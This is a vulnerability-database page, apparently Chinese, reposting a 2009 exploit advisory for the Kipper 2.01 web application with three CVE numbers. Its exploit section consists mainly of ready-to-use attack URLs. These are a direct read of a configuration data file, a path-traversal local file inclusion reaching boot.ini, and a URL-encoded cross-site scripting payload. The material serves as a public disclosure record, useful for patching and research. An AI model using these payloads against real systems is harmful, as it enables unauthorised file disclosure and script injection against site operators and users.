Kipper 2.01 (XSS/LFI/DD) Multiple Vulnerabilities

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1052122 漏洞类型
发布时间 2009-03-08 更新时间 2009-03-08
CVE编号 CVE-2009-0763
CVE-2009-0765
CVE-2009-0767
CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2009030134
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
# Kipper 2.01 Multiple Vulnes ( Remote Data Reading , Local File Include , Remote XSS )

# Download From : http://www.bookelves.com/kipper/files/kipper20.zip

- Found By : RoMaNcYxHaCkEr
- My Site : WwW.Sec-Code.CoM
- My Group : Security - Codes Group

# Exploit [1]:

- Remote Data Reading :

http://localhost/kipper20/job/config.data

# Exploit [2]:

- Local File Include :

http://localhost/kipper20/index.php?configfile=../../../../boot.ini

# Exploit [3]:

- Remote XSS :

http://localhost/kipper20/default.php?charm=%3E%20%3E%20ScRiPt%20%3EALERT%20529227151633%20%3B%20%2FScRiPt%3E#685828818694793444

# EOF ..

# rXh

# bEST wISHES